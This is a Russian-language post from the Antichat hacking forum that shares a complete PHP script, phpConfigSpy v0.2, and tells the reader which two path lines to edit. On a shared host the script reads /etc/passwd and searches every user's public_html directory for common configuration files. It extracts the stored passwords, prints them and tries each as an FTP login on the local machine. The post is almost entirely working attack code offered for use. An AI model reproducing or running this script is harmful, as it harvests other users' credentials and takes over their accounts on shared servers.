Форум АНТИЧАТ - nobody >> root возможно ли

Раз уж на то пошло, вот мой скрипт для нахождения в системе конфигурационных файлов, вытягивания оттуда пары логин:пароль и пробе подключения к ftp.
скрипт несложный, разберешься.
необходимо изменить всего 2 строчки:
Цитата:
$dirz = "/home/$username/public_html/";
и
$path = "/home/$user/public_html/";
- полный путь до директорий с сайтами.
PHP код:

		
			
<?php

/*

phpConfigSpy v0.2

coded by p-range #645552

(c) http://p-range.info

*/

echo '<html><head><title>phpConfigSpy v0.2</title></head><body>';

($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');

set_time_limit(0);

###################

@$passwd = fopen('/etc/passwd','r');

if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }

$pub = array();

$users = array();

$conf = array();

$i = 0;

while(!feof($passwd))

{

    $str = fgets($passwd);

        if ($i > 35)

        {

            $pos = strpos($str,':');

            $username = substr($str,0,$pos);

            $dirz = '/home/'.$username.'/public_html/';

            if (($username != ''))

            {

                if (is_readable($dirz))

                {

                    array_push($users,$username);

                    array_push($pub,$dirz);

                }

            }

          }

    $i++;

}

###################

echo '<br><br><textarea cols="100" rows="20">';

echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";

echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";

echo "[~] Searching for passwords in config files...\n\n";

foreach ($users as $user)

{

    $path = "/home/$user/public_html/";

    read_dir($path,$user);

}

echo "\n[+] Done\n";

function read_dir($path,$username)

{

    if ($handle = opendir($path))

    {

        while (false !== ($file = readdir($handle)))

        {

            $fpath = "$path$file";

            if (($file != '.') and ($file != '..'))

            {

                if (is_readable($fpath))

                {

                    $dr = $fpath."/";

                    if (is_dir($dr))

                    {

                        read_dir($dr,$username);

                    }

                    else

                    {

                         if (

                             ($file=='config.php')

                         or ($file=='config.inc.php')

                         or ($file=='conf.php')

                         or ($file=='settings.php')

                         or ($file=='setup.php')

                         or ($file=='dbconf.php')

                         or ($file=='dbconfig.php')

                         or ($file=='db.inc.php')

                         or ($file=='dbconnect.php')

                         or ($file=='connect.php')

                         or ($file=='index.php')

                         or ($file=='common.php')

                         or ($file=='config_global.php')

                         or ($file=='db.php')

                         or ($file=='connect.inc.php')

                         or ($file=='dbconnect.inc.php'))

                        {

                            $pass = get_pass($fpath);

                            if ($pass != '')

                            {

                                echo "[+] $fpath\n$pass\n";

                                ftp_check($username,$pass);

                            }

                        }

                    }

                }

            }

        }

    }

}

function get_pass($link)

{

    @$config = fopen($link,'r');

    while(!feof($config))

    {

        $line = fgets($config);

        if (strstr($line,'pass')

        or strstr($line,'pwd')

        or strstr($line,'db_pass')

        or strstr($line,'dbpass')

        or strstr($line,'passwd'))

        {

            if (strrpos($line,'"'))

            {

                preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);

                $pass = str_replace("]=\"","",$pass);

            }

            

            else

                preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);

                $pass = str_replace("]='","",$pass);

            return $pass[2];

        }

    }

}

function ftp_check($login,$pass)

{

    @$ftp = ftp_connect('127.0.0.1');

    if ($ftp)

    {

        @$res = ftp_login($ftp,$login,$pass);

        if ($res)

        {

            echo '[FTP] '.$login.':'.$pass."  Success !\n";

        }

        else ftp_quit($ftp);

    }

}

echo '</textarea><br><br>Coded by <b>$re@m3r</b> & <b>p-range</b>  <a href=http://p-range.info>p-range.info</a></body></html>';

?>